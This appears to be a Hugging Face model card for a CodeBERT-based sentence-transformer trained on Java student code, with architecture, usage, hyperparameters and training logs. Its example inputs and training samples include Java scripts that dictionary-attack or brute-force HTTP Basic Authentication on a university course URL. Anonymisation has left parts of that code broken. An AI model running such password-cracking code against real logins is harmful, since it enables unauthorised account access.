SentenceTransformer based on microsoft/codebert-base
This is a sentence-transformers model finetuned from microsoft/codebert-base. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/codebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns:
sentence_0
,sentence_1
, andlabel
- Approximate statistics based on the first 1000 samples:
sentence_0 sentence_1 label type string string int details - min: 61 tokens
- mean: 471.36 tokens
- max: 512 tokens
- min: 61 tokens
- mean: 491.01 tokens
- max: 512 tokens
- 0: ~99.50%
- 1: ~0.50%
- Samples:
sentence_0 sentence_1 label
public class ImageFile
{
private String imageUrl;
private int imageSize;
public ImageFile(String url, int size)
{
imageUrl=url;
imageSize=size;
}
public String getImageUrl()
{
return imageUrl;
}
public int getImageSize()
{
return imageSize;
}
}
import java.net.;
import java.io.;
import java.util.Date;
public class MyMail implements Serializable
{
public static final int SMTPPort = 25;
public static final char successPrefix = '2';
public static final char morePrefix = '3';
public static final char failurePrefix = '4';
private static final String CRLF = "\r\n";
private String mailFrom = "";
private String mailTo = "";
private String messageSubject = "";
private String messageBody = "";
private String mailServer = "";
public MyMail ()
{
super();
}
public MyMail ( String serverName)
{
super();
mailServer = serverName;
}
public String getFrom()
{
return mailFrom;
}
public String getTo()
{
return mailTo;
}
public String getSubject()
{
return messageSubject;
}
public String getMessage()
{
return messageBody;
}
public String getMailServer()
{
return mailServer;
}
public void setFrom( String from )
{
mailFr...0
import java.util.;
import java.net.;
import java.io.*;
public class WatchDog
{
private Vector init;
public WatchDog()
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://www.cs.rmit.edu./students/ -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
init = new Vector();
while ((inputLine = in.readLine()) != null)
{
init.addElement(inputLine);
}
}catch(Exception e)
{
}
}
public static void main(String args[])
{
WatchDog wd = new WatchDog();
wd.nextRead();
}
public void nextRead()
{
while(true)
{
ScheduleTask sch = new ScheduleTask(init);
if(sch.getFlag()!=0)
{
System.out.println("change happen");
WatchDog wd = new WatchDog();
wd.nextRead();
}
}
}
}
import java.net.;
import java.io.;
import java.util.*;
public class Dictionary{
private static URL location;
private static String user;
private BufferedReader input;
private static BufferedReader dictionary;
private int maxLetters = 3;
public Dictionary() {
Authenticator.setDefault(new MyAuthenticator ());
startTime = System.currentTimeMillis();
boolean passwordMatched = false;
while (!passwordMatched) {
try {
input = new BufferedReader(new InputStreamReader(location.openStream()));
String line = input.readLine();
while (line != null) {
System.out.println(line);
line = input.readLine();
}
input.close();
passwordMatched = true;
}
catch (ProtocolException e)
{
}
catch (ConnectException e) {
System.out.println("Failed connect");
}
catch (IOException e) ...0
import java.util.;
import java.net.;
import java.io.*;
public class ScheduleTask extends Thread
{
private int flag=0,count1=0,count2=0;
private Vector change;
public ScheduleTask(Vector init)
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://yallara.cs.rmit.edu./~/index.html -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
Vector newVector = new Vector();
change = new Vector();
while ((inputLine = in.readLine()) != null)
{
newVector.addElement(inputLine);
}
if(init.size()>newVector.size())
{
for(int k=0;k {
if(!newVector.elementAt(k).toString().equals(init.elementAt(k).toString()))
ch...import java.io.;
import java.net.;
import java.util.*;
public class Dictionary
{
public static void main (String args[])
{
Calendar cal = Calendar.getInstance();
Date now=cal.getTime();
double startTime = now.getTime();
String password=getPassword(startTime);
System.out.println("The password is " + password);
}
public static String getPassword(double startTime)
{
String password="";
int requests=0;
try
{
FileReader fRead = new FileReader("/usr/share/lib/dict/words");
BufferedReader buf = new BufferedReader(fRead);
password=buf.readLine();
while (password != null)
{
if (password.length()<=3)
{
requests++;
if (testPassword(password, startTime, requests))
return password;
}
password = buf.readLine();
}
}
catch (IOException ioe)
{
}
return password;
}
private static boolean testPassword(String password, double startTime, int requests)
{
try
{
U...0
- Loss:
BatchAllTripletLoss
Training Hyperparameters
Non-Default Hyperparameters
per_device_train_batch_size
: 16per_device_eval_batch_size
: 16num_train_epochs
: 1multi_dataset_batch_sampler
: round_robin
All Hyperparameters
Click to expand
overwrite_output_dir
: Falsedo_predict
: Falseeval_strategy
: noprediction_loss_only
: Trueper_device_train_batch_size
: 16per_device_eval_batch_size
: 16per_gpu_train_batch_size
: Noneper_gpu_eval_batch_size
: Nonegradient_accumulation_steps
: 1eval_accumulation_steps
: Nonetorch_empty_cache_steps
: Nonelearning_rate
: 5e-05weight_decay
: 0.0adam_beta1
: 0.9adam_beta2
: 0.999adam_epsilon
: 1e-08max_grad_norm
: 1num_train_epochs
: 1max_steps
: -1lr_scheduler_type
: linearlr_scheduler_kwargs
: {}warmup_ratio
: 0.0warmup_steps
: 0log_level
: passivelog_level_replica
: warninglog_on_each_node
: Truelogging_nan_inf_filter
: Truesave_safetensors
: Truesave_on_each_node
: Falsesave_only_model
: Falserestore_callback_states_from_checkpoint
: Falseno_cuda
: Falseuse_cpu
: Falseuse_mps_device
: Falseseed
: 42data_seed
: Nonejit_mode_eval
: Falseuse_ipex
: Falsebf16
: Falsefp16
: Falsefp16_opt_level
: O1half_precision_backend
: autobf16_full_eval
: Falsefp16_full_eval
: Falsetf32
: Nonelocal_rank
: 0ddp_backend
: Nonetpu_num_cores
: Nonetpu_metrics_debug
: Falsedebug
: []dataloader_drop_last
: Falsedataloader_num_workers
: 0dataloader_prefetch_factor
: Nonepast_index
: -1disable_tqdm
: Falseremove_unused_columns
: Truelabel_names
: Noneload_best_model_at_end
: Falseignore_data_skip
: Falsefsdp
: []fsdp_min_num_params
: 0fsdp_config
: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap
: Noneaccelerator_config
: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed
: Nonelabel_smoothing_factor
: 0.0optim
: adamw_torchoptim_args
: Noneadafactor
: Falsegroup_by_length
: Falselength_column_name
: lengthddp_find_unused_parameters
: Noneddp_bucket_cap_mb
: Noneddp_broadcast_buffers
: Falsedataloader_pin_memory
: Truedataloader_persistent_workers
: Falseskip_memory_metrics
: Trueuse_legacy_prediction_loop
: Falsepush_to_hub
: Falseresume_from_checkpoint
: Nonehub_model_id
: Nonehub_strategy
: every_savehub_private_repo
: Nonehub_always_push
: Falsegradient_checkpointing
: Falsegradient_checkpointing_kwargs
: Noneinclude_inputs_for_metrics
: Falseinclude_for_metrics
: []eval_do_concat_batches
: Truefp16_backend
: autopush_to_hub_model_id
: Nonepush_to_hub_organization
: Nonemp_parameters
:auto_find_batch_size
: Falsefull_determinism
: Falsetorchdynamo
: Noneray_scope
: lastddp_timeout
: 1800torch_compile
: Falsetorch_compile_backend
: Nonetorch_compile_mode
: Noneinclude_tokens_per_second
: Falseinclude_num_input_tokens_seen
: Falseneftune_noise_alpha
: Noneoptim_target_modules
: Nonebatch_eval_metrics
: Falseeval_on_start
: Falseuse_liger_kernel
: Falseeval_use_gather_object
: Falseaverage_tokens_across_devices
: Falseprompts
: Nonebatch_sampler
: batch_samplermulti_dataset_batch_sampler
: round_robin
Training Logs
Epoch | Step | Training Loss |
---|---|---|
0.2393 | 500 | 0.1875 |
0.4787 | 1000 | 0.1815 |
0.7180 | 1500 | 0.24 |
0.9574 | 2000 | 0.1596 |
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
- Downloads last month
- 8
Inference Providers
NEW
This model isn't deployed by any Inference Provider.
🙋
Ask for provider support
Model tree for buelfhood/SOCO-Java-CodeBERT-ST
Base model
microsoft/codebert-base